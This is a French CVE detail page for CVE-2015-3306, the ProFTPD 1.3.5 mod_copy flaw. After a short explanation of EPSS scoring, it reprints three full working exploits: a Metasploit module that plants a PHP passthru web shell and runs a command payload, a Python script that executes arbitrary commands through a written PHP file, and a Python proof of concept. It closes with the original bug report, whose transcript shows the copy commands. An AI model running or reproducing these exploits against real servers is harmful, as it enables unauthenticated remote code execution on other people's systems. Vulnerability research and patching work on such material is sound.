CVE-2015-3306 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'ProFTPD 1.3.5 Mod_Copy Command Execution', 'Description' => %q{ This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the 'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible. }, 'Author' => [ 'Vadim Melihow', # Original discovery, Proof of Concept 'xistence <xistence[at]0x90.nl>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2015-3306' ], [ 'EDB', '36742' ] ], 'Privileged' => false, 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Payload' => { 'BadChars' => '', 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic gawk bash python perl' } }, 'Targets' => [ [ 'ProFTPD 1.3.5', { } ] ], 'DisclosureDate' => 'Apr 22 2015', 'DefaultTarget' => 0)) register_options( [ OptPort.new('RPORT', [true, 'HTTP port', 80]), OptPort.new('RPORT_FTP', [true, 'FTP port', 21]), OptString.new('TARGETURI', [true, 'Base path to the website', '/']), OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']), OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www']) ], self.class) end def check ftp_port = datastore['RPORT_FTP'] sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port) if sock.nil? fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server") else print_status("#{rhost}:#{ftp_port} - Connected to FTP server") end res = sock.get_once(-1, 10) unless res && res.include?('220') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner") end sock.puts("SITE CPFR /etc/passwd\r\n") res = sock.get_once(-1, 10) if res && res.include?('350') Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end end def exploit ftp_port = datastore['RPORT_FTP'] get_arg = rand_text_alphanumeric(5+rand(3)) payload_name = rand_text_alphanumeric(5+rand(3)) + '.php' sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port) if sock.nil? fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server") else print_status("#{rhost}:#{ftp_port} - Connected to FTP server") end res = sock.get_once(-1, 10) unless res && res.include?('220') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner") end print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server") sock.puts("SITE CPFR /proc/self/cmdline\r\n") res = sock.get_once(-1, 10) unless res && res.include?('350') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline") end sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n") res = sock.get_once(-1, 10) unless res && res.include?('250') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file") end sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n") res = sock.get_once(-1, 10) unless res && res.include?('350') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file") end sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n") res = sock.get_once(-1, 10) unless res && res.include?('250') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?") end sock.close print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}") res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, payload_name), 'method' => 'GET', 'vars_get' => { get_arg => "nohup #{payload.encoded} &" } ) unless res && res.code == 200 fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload") end end end

# Title: ProFTPd 1.3.5 Remote Command Execution # Date : 20/04/2015 # Author: R-73eN # Software: ProFTPd 1.3.5 with mod_copy # Tested : Kali Linux 1.06 # CVE : 2015-3306 # Greetz to Vadim Melihow for all the hard work . import socket import sys import requests #Banner banner = "" banner += " ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if(len(sys.argv) < 4): print '\n Usage : exploit.py server directory cmd' else: server = sys.argv[1] #Vulnerable Server directory = sys.argv[2] # Path accessible from web ..... cmd = sys.argv[3] #PHP payload to be executed evil = '<?php system("' + cmd + '") ?>' s.connect((server, 21)) s.recv(1024) print '[ + ] Connected to server [ + ] \n' s.send('site cpfr /etc/passwd') s.recv(1024) s.send('site cpto ' + evil) s.recv(1024) s.send('site cpfr /proc/self/fd/3') s.recv(1024) s.send('site cpto ' + directory + 'infogen.php') s.recv(1024) s.close() print '[ + ] Payload sended [ + ]\n' print '[ + ] Executing Payload [ + ]\n' r = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP if (r.status_code == 200): print '[ * ] Payload Executed Succesfully [ * ]' else: print ' [ - ] Error : ' + str(r.status_code) + ' [ - ]' print '\n http://infogen.al/'

# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) # Date: 25/05/2021 # Exploit Author: Shellbr3ak # Version: 1.3.5 # Tested on: Ubuntu 16.04.6 LTS # CVE : CVE-2015-3306 #!/usr/bin/env python3 import sys import socket import requests def exploit(client, target): client.connect((target,21)) # Connecting to the target server banner = client.recv(74) print(banner.decode()) client.send(b'site cpfr /etc/passwd\r\n') print(client.recv(1024).decode()) client.send(b'site cpto <?php phpinfo(); ?>\r\n') # phpinfo() is just a PoC. print(client.recv(1024).decode()) client.send(b'site cpfr /proc/self/fd/3\r\n') print(client.recv(1024).decode()) client.send(b'site cpto /var/www/html/test.php\r\n') print(client.recv(1024).decode()) client.close() print('Exploit Completed') def check(url): req = requests.get(url) # Requesting the written PoC php file via HTTP if req.status_code == 200: print('[+] File Written Successfully') print(f'[+] Go to : {url}') else: print('[!] Something Went Wrong') print('[!] Directory might not be writable') def main(): client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) target = sys.argv[1] exploit(client, target) url = 'http://' + target + '/test.php' check(url) if __name__ == '__main__': main()

Description TJ Saunders 2015-04-07 16:35:03 UTC Vadim Melihow reported a critical issue with proftpd installations that use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands to be used by *unauthenticated clients*: --------------------------------- Trying 80.150.216.115... Connected to 80.150.216.115. Escape character is '^]'. 220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115] site help 214-The following SITE commands are recognized (* =>'s unimplemented) 214-CPFR <sp> pathname 214-CPTO <sp> pathname 214-UTIME <sp> YYYYMMDDhhmm[ss] <sp> path 214-SYMLINK <sp> source <sp> destination 214-RMDIR <sp> path 214-MKDIR <sp> path 214-The following SITE extensions are recognized: 214-RATIO -- show all ratios in effect 214-QUOTA 214-HELP 214-CHGRP 214-CHMOD 214 Direct comments to root@www01a site cpfr /etc/passwd 350 File or directory exists, ready for destination name site cpto /tmp/passwd.copy 250 Copy successful ----------------------------------------- He provides another, scarier example: ------------------------------ site cpfr /etc/passwd 350 File or directory exists, ready for destination name site cpto <?php phpinfo(); ?> 550 cpto: Permission denied site cpfr /proc/self/fd/3 350 File or directory exists, ready for destination name site cpto /var/www/test.php test.php now contains ---------------------- 2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument 2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): FTP session opened. 2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php phpinfo(); ?>' for copying: Permission denied ----------------------- test.php contains contain correct php script "<?php phpinfo(); ?>" which can be run by the php interpreter Source: http://bugs.proftpd.org/show_bug.cgi?id=4169